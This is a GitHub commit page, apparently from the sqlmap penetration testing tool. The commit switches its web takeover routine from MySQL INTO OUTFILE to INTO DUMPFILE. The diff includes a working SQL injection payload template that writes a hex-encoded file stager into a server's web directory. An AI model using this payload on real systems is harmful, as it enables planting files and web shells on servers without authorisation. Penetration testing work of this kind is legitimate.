Thanks to visit codestin.com
Credit goes to github.com

Skip to content

Commit c211255

Browse files
bdamelebdamele
committed
replaced outfile with dumpfile so works even if the original statement outputs blob
1 parent 39ab3b9 commit c211255

2 files changed

Lines changed: 4 additions & 4 deletions

File tree

lib/takeover/web.py

Lines changed: 3 additions & 3 deletions
Original file line numberDiff line numberDiff line change
@@ -139,7 +139,7 @@ def _webFileInject(self, fileContent, fileName, directory):
139139
randInt = randomInt()
140140
query += "OR %d=%d " % (randInt, randInt)
141141

142-
query += getSQLSnippet(DBMS.MYSQL, "write_file_limit", OUTFILE=outFile, HEXSTRING=hexencode(uplQuery))
142+
query += getSQLSnippet(DBMS.MYSQL, "write_file_limit", DUMPFILE=outFile, HEXSTRING=hexencode(uplQuery))
143143
query = agent.prefixQuery(query)
144144
query = agent.suffixQuery(query)
145145
payload = agent.payload(newValue=query)
@@ -217,9 +217,9 @@ def webInit(self):
217217
else:
218218
directory = directory[2:] if isWindowsDriveLetterPath(directory) else directory
219219

220-
# Upload the file stager with the LIMIT 0, 1 INTO OUTFILE technique
220+
# Upload the file stager with the LIMIT 0, 1 INTO DUMPFILE technique
221221
infoMsg = "trying to upload the file stager on '%s' " % directory
222-
infoMsg += "via LIMIT INTO OUTFILE technique"
222+
infoMsg += "via LIMIT INTO DUMPFILE technique"
223223
logger.info(infoMsg)
224224
self._webFileInject(stagerContent, stagerName, directory)
225225

procs/mysql/write_file_limit.sql

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -1 +1 @@
1-
LIMIT 0,1 INTO OUTFILE '%OUTFILE%' LINES TERMINATED BY 0x%HEXSTRING%--
1+
LIMIT 0,1 INTO DUMPFILE '%DUMPFILE%' LINES TERMINATED BY 0x%HEXSTRING%--

0 commit comments

Comments
 (0)